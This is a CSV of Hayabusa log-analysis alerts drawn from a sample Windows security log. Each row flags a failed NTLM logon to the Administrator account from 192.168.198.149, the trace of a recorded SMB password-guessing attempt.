2016-09-20 01:51:53.964 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WxVdhpR7ZnAluurU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:54.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gZjAZb9bQKZjwL8u : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:54.066 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aKyLX5ChpgBuFEbr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:54.112 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 49t2xJvH2yHcyHle : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:54.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sg9Z6Pyix2UkMolr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:54.210 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0NN2olYn97ZoYCja : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:54.249 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: S98j54bDGsz0k6g9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:54.284 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XxFEw9s0nnEQGzUN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:54.342 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wSswFHFSlqcQd47k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:54.385 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7icutlVIWSLZJszQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:54.440 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DSwyugYn0n3i5f25 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:54.473 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RmBaLCUcR7TmixTy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:54.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1oOBz2NQSCdTwa7V : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:54.582 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O4tU1LPF5DRW9Vm0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:54.633 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SRsSNqPYruWBzp2n : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:54.684 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3JZhBLzt4af1VtCU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:54.729 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dFLZIKSDBvBaWq59 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:54.774 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: guAG4ZTFMjZAxp1A : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:54.817 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Yd04xsSIdiczICeG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:54.865 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Cx3i1URKPhC6KWI7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:54.914 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Npc6IS27HsWP3JA9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:54.963 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KIBnr0eZ1bHHGokW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:55.013 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6gTTrUVjpPU80LlC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:55.078 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FZlmUbCNAJga24JH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:55.136 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Zf3aSGBMe97VujaH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:55.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8bx7ZM77aDG7y6Lh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:55.220 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BnHHAClMwyqA3TTI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:55.260 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 00ibRrYvnFt5w9X0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:55.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VglTKbnLVFvHZHzQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:55.358 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3NwX0sDFwHQG7Tkq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:55.413 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3mMx3M1zurKMBzyj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:55.468 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sH7b8P0O0uea3PlN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:55.530 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TJcrTyBPuX0TcvOT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:55.574 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kwuZIQAL3BmJnPsJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:55.620 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lxgAfsnH6YWLRD0a : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:55.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ttBOjzmEBjr9W2QW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:55.732 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FPDKGGYkJQeWgtUf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:55.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nSoJWqS6YPbpCiBf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:55.887 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Pr2oMzxv7pcDfsgw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:55.940 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jiopmZAMpwg3dEaA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:55.989 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tG1Bxm0lt3vwoO5V : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:56.043 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9Kf5AaQX7KOVAIAN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:56.097 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FW9nBirBTHIXIrfp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:56.148 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: S9qKcDhfcf2kMk00 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:56.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9NgStzf2xQ4P7q0d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:56.225 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j9mCrjQykX06IcMf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:56.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7S0QccvEhetekdDP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:56.298 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n1OnibuatFHwDeLz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:56.342 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O8u26bKzFOw12m0T : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:56.380 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WEEtOj6BOkI7MPY1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:56.420 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EiCpuqll36DojD3e : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:56.469 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p9zjo9ZsSVLZcrsr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:56.530 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KKDD0O5flEsIEDRZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:56.582 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jdPMREVdBEJ50ELC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:56.626 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p7YwRYYCnsr2v08C : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:56.677 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nWyAzzpmxUm2CXE9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:56.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9RNqhxyUBjUIic0n : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:56.774 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1JERyz3mOBZt2jki : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:56.817 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V0i93RW5AOsIKKMU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:56.875 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: U3XEu06vE68O900O : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:56.925 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0fxeGE2jXOnoJttj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:56.969 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6Wdg3l6IFHTdh09j : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:57.028 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4XLVQRnkUd3bfgvF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:57.080 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rHjqFQwqpCJFI6qP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:57.139 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: L5pEWq2mYsFpFLbb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:57.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HSFKJXTC2wlyw0gu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:57.225 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vh5igCJpAA5rmqzV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:57.260 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5NzLlJWkfXDcm64c : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:57.309 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i9sR1QHgZ4oaa82F : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:57.340 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Pq1GWcKzSHSP28hk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:57.388 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: agCtM0s62zXPop0y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:57.430 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dVvglj7RtxrBUeXi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:57.482 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pMbS0sIpbFDqJvMW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:57.525 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ldO0cAZ54BRHHDyz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:57.577 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OmJH2QWFPiYarKh5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
